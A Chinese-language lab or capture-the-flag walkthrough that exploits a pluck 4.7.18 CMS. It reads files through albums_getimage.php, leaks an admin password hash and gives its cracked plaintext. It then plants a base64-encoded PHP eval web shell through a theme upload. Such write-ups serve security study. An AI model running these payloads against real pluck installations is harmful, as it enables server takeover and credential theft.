信息收集
访问页面如下
访问admin后台
发现CMS框架版本:pluck 4.7.18
主页的URL形式感觉可能有任意文件读取,发现被过滤。
查看官方github上的issue,刚好有人提交了最新的漏洞信息。
https://github.com/pluck-cms/pluck/issues/123
下载漏洞草案信息。
https://github.com/pluck-cms/pluck/files/14239298/Borrador_aviso_CVE.docx
看到描述上说有相对路径穿越漏洞,但只能读取当前目录和子目录文件。
查看另一个issue,写的很清楚,
https://github.com/pluck-cms/pluck/issues/122
漏洞利用
漏洞点位于albums_getimage.php
payload
http://10.10.11.17/data/modules/albums/albums_getimage.php?image=mist.php
能够读取目录/data/settings/modules/albums/
下的文件
这个目录下刚好有一个admin_backup.php
里面存有password
payload
http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e
hash解密
直接上cmd5 充了钱就是狂👊
接出来密码是lexypoo97
使用密码登录后台
后台可以getshell,参考文章
在安装主题处,上传info.zip,info.zip内有info.php。
再返回主题页面
info.php
<?php
file_put_contents('x.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydza3knXSk7Pz4='));
?>
然后使用蚁剑连接shell
http://10.10.11.17/x.php
sky